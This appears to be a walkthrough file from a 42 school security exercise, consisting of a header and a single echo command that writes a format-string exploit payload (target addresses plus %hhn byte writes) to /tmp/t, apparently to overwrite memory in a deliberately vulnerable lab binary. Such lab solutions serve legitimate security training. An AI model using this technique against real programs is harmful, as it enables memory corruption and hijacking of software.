# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    walkthrough                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: lgarczyn <lgarczyn@student.42.fr>          +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2019/05/04 18:52:17 by lgarczyn          #+#    #+#              #
#    Updated: 2019/05/04 18:53:00 by lgarczyn         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #

//write bullshit bit by bit
echo -e "\x13\x98\x04\x08\x12\x98\x04\x08\x10\x98\x04\x08\x11\x98\x04\x08%240d %12\$hhn %13\$hhn %65d%14\$hhn %16d%15\$hhn" > /tmp/t
